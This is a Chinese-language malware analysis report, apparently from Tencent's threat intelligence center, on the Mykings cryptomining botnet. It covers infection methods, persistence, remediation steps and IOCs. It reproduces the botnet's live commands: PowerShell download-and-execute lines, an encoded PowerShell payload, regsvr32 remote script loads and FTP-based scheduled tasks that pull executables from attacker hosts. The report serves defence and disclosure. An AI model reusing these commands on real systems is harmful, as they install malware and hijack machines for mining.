背景騰訊安全御見威脅情報中心近期檢測到Mykings挖礦僵尸網(wǎng)絡(luò)更新基礎(chǔ)設(shè)施，病毒啟用了新的域名，挖礦使用新的錢包收益已超過60萬人民幣，

背景

騰訊安全御見威脅情報中心近期檢測到Mykings挖礦僵尸網(wǎng)絡(luò)更新基礎(chǔ)設(shè)施，病毒啟用了新的域名，挖礦使用新的錢包收益已超過60萬人民幣，并且仍每天以約10個XMR的速度挖掘。

Mykings通過1433端口爆破、永恒之藍(lán)漏洞攻擊等方法進(jìn)入系統(tǒng)，然后植入RAT、Miner等木馬，組成龐大的僵尸網(wǎng)絡(luò)。

Mykings挖礦僵尸網(wǎng)絡(luò)更新版本具有以下特點(diǎn)：

1. 利用永恒之藍(lán)漏洞、1433端口爆破等方法進(jìn)行攻擊，并包含Mirai僵尸網(wǎng)絡(luò)的感染代碼。

2. 感染MBR(感染流程與暗云病毒一致)，通過Rookit對抗殺軟以及下載Payload。

3. 清除競品挖礦木馬，關(guān)閉端口封堵其他病毒的入侵渠道。

4. 通過安裝多個計劃任務(wù)后門、WMI后門進(jìn)行持久化。

Mykings挖礦僵尸網(wǎng)絡(luò)

詳細(xì)分析

被感染設(shè)備通過WMI后門執(zhí)行Powershell命令

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http://74.222.14.94/blue.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;

然后從blue.txt中獲取3個木馬的下載地址，依次下載和執(zhí)行：

上述三個木馬分析如下：

ok.exe

ok.exe功能為感染MBR。從而實(shí)現(xiàn)自保護(hù)，殺軟對抗，以及聯(lián)網(wǎng)下載payload的功能。

感染流程與騰訊御見威脅情報中心發(fā)現(xiàn)的暗云系列病毒(參考https://s.tencent.com/research/report/622.html)類似。MBR木馬在最后一個階段對ZwCreateSection進(jìn)行HOOK， 在獲得執(zhí)行機(jī)會后將rootkit映射到內(nèi)核空間并執(zhí)行，最后跳轉(zhuǎn)到ZwCreateSection繼續(xù)執(zhí)行。

Rootkit主要功能為自保護(hù), 結(jié)束殺軟進(jìn)程，及注入系統(tǒng)進(jìn)程winlogon.exe聯(lián)網(wǎng)下載payload執(zhí)行下一階段的惡意行為。

Rootkit獲取用于更新木馬的IP地址http[:]//www.upme0611.info/address.txt

獲取下一階段Payload代碼配置文件http[:]//mbr.kill0604.ru/cloud.txt，從該配置文件中得到挖礦模塊upsupx.exe的下載地址，隨后下載執(zhí)行該文件。

upsupx.exe

upsupx.exe被下載保存至C:\Windows\Temp\conhost.exe執(zhí)行。下載解密挖礦相關(guān)配置文件到C:\Program Files\Common Files\xpdown.dat，配置文件內(nèi)容如下：

45.58.135.106

74.222.14.61

139.5.177.10

ok.xmr6b.ru

獲取要清除的競爭對手或者老版本的挖礦木馬，包括文件名、路徑、是否清除。

然后通過讀注冊表位置(HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0)

檢測CPU類型及頻率,根據(jù)CPU的類型和頻率確定使用哪種類型的挖礦程序。

下載開源挖礦程序XMRig,地址為http[:]//198.148.90.34/64work.rar，程序版本2.14.1，挖礦程序啟動路徑為C:\Windows\inf\lsmm.exe

啟動后從資源文件中獲取挖礦配置文件，得到礦池地址：pool.minexmr.com:5555

錢包455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

根據(jù)錢包查詢收益：已挖礦獲得1077個XMR

當(dāng)前市場價格折合人民幣60萬元

u.exe

u.exe利用攻擊模塊C:\Windows\system\msinfo.exe對內(nèi)網(wǎng)以及外網(wǎng)機(jī)器IP段進(jìn)行掃描攻擊，方法包括利用永恒之藍(lán)漏洞、SQL爆破、Telnet爆破、RDP爆破等，部分攻擊payload還包含感染mirai僵尸網(wǎng)絡(luò)的相關(guān)代碼。

掃描445/1433等端口

永恒之藍(lán)漏洞攻擊

SQL爆破攻擊

爆破登錄后執(zhí)行Shellcode

Telnet爆破攻擊

RDP爆破攻擊

持久化

Myings挖礦僵尸網(wǎng)絡(luò)會使用以下手法進(jìn)行持久化：

1. 刪除其他病毒設(shè)置的登錄賬戶

通過net user刪除賬戶mm123$、admin、sysadm05;attrib命令設(shè)置Temp目錄下文件為隱藏屬性;taskkill殺死其他挖礦進(jìn)程，刪除其他挖礦進(jìn)程文件、遠(yuǎn)程桌面程序文件;cacls設(shè)置部分目錄及文件的可見性。

通過wmic命令刪除偽裝成系統(tǒng)進(jìn)程的挖礦程序，判斷依據(jù)為文件為系統(tǒng)進(jìn)程名，但是卻不在系統(tǒng)目錄下。

2.設(shè)置相關(guān)文件、路徑的屬性為隱藏

3.關(guān)閉系統(tǒng)自更新

刪除以下計劃任務(wù)，關(guān)閉系統(tǒng)自更新：

SCHTASKS/Delete/TN"WindowsUpdate1"/F&SCHTASKS/Delete/TN"WindowsUpdate3"/F&SCHTASKS/Delete/TN"Windows_Update"/F&SCHTASKS/Delete/TN"Update"/F&SCHTASKS/Delete/TN"Update2"/F&SCHTASKS/Delete/TN"Update4"/F&SCHTASKS/Delete/TN"Update3"/F&SCHTASKS/Delete/TN"windowsinit"/F&SCHTASKS/Delete/TN"SystemSecurityCheck"/F&SCHTASKS/Delete/TN"AdobeFlashPlayer"/F&SCHTASKS/Delete/TN"updat_windows"/F&SCHTASKS/Delete/TN"at1"/F&SCHTASKS/Delete/TN"at2"/F&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Enterprise]"/F&SCHTASKS/DELETE/TN"\Microsoft\Windows\UPnP\Services"/f&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Standard]"/F

4.阻止139/445等端口的連接

網(wǎng)絡(luò)防火墻設(shè)置，設(shè)置65536端口的連接請求為允許，設(shè)置135/137/138/139/445端口的連接為拒絕。

5.添加注冊表啟動項(xiàng)

添加注冊表Run啟動項(xiàng)：

6.添加大量計劃任務(wù)后門

添加5個計劃任務(wù)：

任務(wù)1：Mysa

執(zhí)行：cmd /c echo openftp.0603bye.info>s&echo test>>s&echo 1433>>s&echobinary>>s&echo get a.exe c:\windows\update.exe>>s&echobye>>s&ftp -s:s&c:\windows\update.exe

任務(wù)2：Mysa1

執(zhí)行：rundll32.exe C:\windows\debug\item.dat,ServiceMain aaaa

任務(wù)3：Mysa2

執(zhí)行：cmd /c echo open ftp.0603bye.info>p&echotest>>p&echo 1433>>p&echo get s.datc:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

任務(wù)4：Mysa3

執(zhí)行：/c echo openftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echoget s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp-s:ps&c:\windows\help\lsmosee.exe

任務(wù)5：ok

執(zhí)行：cmd c:\windows\debug\ok.dat,ServiceMainaaaa

各計劃任務(wù)后門功能整理如下：

7.添加執(zhí)行大量命令的WMI后門

通過創(chuàng)建WMI事件過濾器和消費(fèi)者來添加后門。

刪除舊的事件過濾器和消費(fèi)者：

fuckyoumm2_filterfuckyoumm2_consumerWindowsEventsFilterWindowsEventsConsumer4WindowsEventsConsumerfuckayoumm3fuckayoumm4

創(chuàng)建新的事件過濾器和消費(fèi)者：

fuckyoumm3

fuckyoumm4

WMI后門執(zhí)行的代碼為：

(1)powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="

(解碼后：

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http[:]//wmi.1217bye.host/2.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;})

(2)powershell.exe IEX

(New-Object system.Net.WebClient).DownloadString('http[:]//wmi.1217bye.host/S.ps1')

(3)powershell.exe IEX

(New-Object system.Net.WebClient).DownloadString('http[:]//173.208.139.170/s.txt')

(4)powershell.exe IEX

(New-Objectsystem.Net.WebClient).DownloadString('http[:]//139.5.177.19/s.jpg')||regsvr32/u /s /i:http[:]//wmi.1217bye.host/1.txt scrobj.dll

(5)regsvr32 /u /s/i:http[:]//173.208.139.170/2.txt scrobj.dll

(6)regsvr32 /u /s/i:http[:]//139.5.177.19/3.txt scrobj.dll

WMI后門執(zhí)行的命令功能整理如下：

安全建議

1、MS010-17 “永恒之藍(lán)”漏洞

服務(wù)器暫時關(guān)閉不必要的端口(如135、139、445)，方法可參考：https://guanjia.qq.com/web_clinic/s8/585.html

下載并更新Windows系統(tǒng)補(bǔ)丁，及時修復(fù)永恒之藍(lán)系列漏洞

XP、WindowsServer2003、win8等系統(tǒng)訪問：http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7、win8.1、WindowsServer 2008、Windows10,WindowsServer2016等系統(tǒng)訪問：https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

2、服務(wù)器使用高強(qiáng)度密碼，切勿使用弱口令，防止黑客暴力破解;

3、使用殺毒軟件攔截可能的病毒攻擊;

4、感染Mykings病毒的用戶除了使用騰訊御點(diǎn)進(jìn)行查殺外，還可通過以下步驟進(jìn)行手動清理：

1)刪除文件

C:\Windows\System32\ok.exe

C:\WINDOWS\system32\max.exe

C:\Windows\SysWOW64\drivers\64.exe

C:\WINDOWS\system\downs.exe

C:\WINDOWS\Temp\conhost.exe

C:\windows\system32\upsupx.exe

C:\Windows\inf\lsmm.exe

C:\WINDOWS\inf\msief.exe

C:\windows\system32\s.exe

C:\WINDOWS\system\msinfo.exe

C:\Windows\Help\lsmosee.exe

C:\windows\debug\lsmosee.exe

C:\windows\debug\item.dat

2)刪除注冊表

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\start

HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run\start

3)刪除計劃任務(wù)

Mysa

Mysa1

Mysa2

Mysa3

ok

4)刪除WMI事件過濾器及消費(fèi)者

fuckyoumm2_filter fuckyoumm2_consumer WindowsEventsFilter WindowsEventsConsumer4 WindowsEventsConsumer fuckayoumm3 fuckayoumm4

fuckyoumm3

fuckyoumm4

IOCs

MD5

9F86AFAE88B2D807A71F442891DFE3D4

147BA798E448EB3CAA7E477E7FB3A959

B89B37A90D0A080C34BBBA0D53BD66DF

1A5EC4861CC11742D308145C32A3842A

5835094B232F999C20FE2B76E9673455

49CC3130496079EBFEA58A069AA4B97A

E5F19CBFBBABA501D4D9A90856FF17D3

A1B9F55BF93E82550B4C21CD3230C3C3

1F0EC5A4B101837EA7CD08FCB3247B2B

FA066F84F3D657DFB9ADF8E0F92F03E7

A1B9F55BF93E82550B4C21CD3230C3C3

IP

139.5.177.10

74.222.14.94

208.110.71.194

80.85.152.247

66.117.2.182

70.39.124.70

150.107.76.227

103.213.246.23

45.58.135.106

103.95.28.54

74.222.14.61

198.148.90.34

185.22.172.13

223.25.247.240

192.187.111.66

66.117.6.174

173.208.139.170

139.5.177.19

173.247.239.186

79.124.78.127

78.142.29.152

74.222.14.61

54.255.141.50

Domain

www.upme0611.info

mbr.kill0604.ru

ok.xmr6b.ru

js.0603bye.info

pc.pc0416.xyz

down2.b5w91.com

wmi.1217bye.host

down.mys2018.xyz

URL

http[:]//74.222.14.94/blue.txt

http[:]//js.0603bye.info:280/v.sct

http[:]//173.247.239.186/ok.exe http[:]//139.5.177.10/upsupx.exe http[:]//139.5.177.10/u.exe

http[:]//185.22.172.13/upsupx.exe

http[:]//www.upme0611.info/address.txt

http[:]//103.213.246.23/address.txt

http[:]//208.110.71.194/cloud.txt

http[:]//mbr.kill0604.ru/cloud.txt

http[:]//mbr.kill0604.ru/TestMsg64.tmp

http[:]//mbr.kill0604.ru/TestMsg.tmp

http[:]//45.58.135.106/kill.txt

http[:]//45.58.135.106/md5.txt

http[:]//45.58.135.106/xpxmr.dat

http[:]//198.148.90.34/64.rar

http[:]//45.58.135.106/vers1.txt

http[:]//208.110.71.194/cloud.txt

http[:]//185.22.172.13/upsupx.exe

http[:]//ok.xmr6b.ru/xpdown.dat

http[:]//ok.xmr6b.ru/ok/vers.html

http[:]//ok.xmr6b.ru/ok/down.html

http[:]//198.148.90.34/64work.rar

http[:]//198.148.90.34/upsupx.exe

http[:]//198.148.90.34/b.exe

http[:]//198.148.90.34/b2.exe

http[:]//198.148.90.34:808/b2.exe

http[:]//198.148.90.34/cudart32_65.dll

http[:]//198.148.90.34/0228.rar

http[:]//223.25.247.240/ok/ups.html

http[:]//173.208.139.170/up.txt

https[:]//173.208.139.170/s.txt

http[:]//173.208.139.170/2.txt

http[:]//wmi.1217bye.host/2.txt

http[:]//wmi.1217bye.host/S.ps1

http[:]//173.208.139.170/s.txt

http[:]//139.5.177.19/s.jpg

http[:]//wmi.1217bye.host/1.txt

http[:]//173.208.139.170/2.txt

http[:]//139.5.177.19/3.txt

http[:]//173.247.239.186/max.exe

http[:]//173.247.239.186/ups.exe

http[:]//173.247.239.186/upsupx.exe

http[:]//139.5.177.19/l.txt

http[:]//79.124.78.127/up.txt

錢包：455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

參考鏈接

https://www.freebuf.com/articles/web/146393.html

https://s.tencent.com/research/report/622.html

https://www.freebuf.com/column/187489.html

來源：騰訊御見威脅情報中心

關(guān)鍵詞： Mykings 挖礦錢包 收益